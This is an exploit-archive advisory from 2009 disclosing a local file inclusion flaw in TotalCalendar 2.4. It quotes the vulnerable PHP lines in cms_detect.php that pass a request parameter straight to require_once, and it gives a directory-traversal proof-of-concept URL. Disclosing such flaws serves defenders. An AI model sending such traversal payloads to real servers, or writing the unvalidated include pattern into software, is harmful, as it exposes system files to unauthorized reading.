id: 5082
date: 04/20/2009
title: TotalCalendar 2.4 (include) Local File Inclusion Vulnerability
author: SirGod
cves: 

==============================================================
TotalCalendar 2.4 (include) Local File Inclusion Vulnerability
==============================================================


##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
##########################################################################################

[+] Local File Inclusion

Vulnerable code in cms_detect.php:

-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------

  PoC :

   http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK

##########################################################################################



#  0day.today [2023-03-24]  #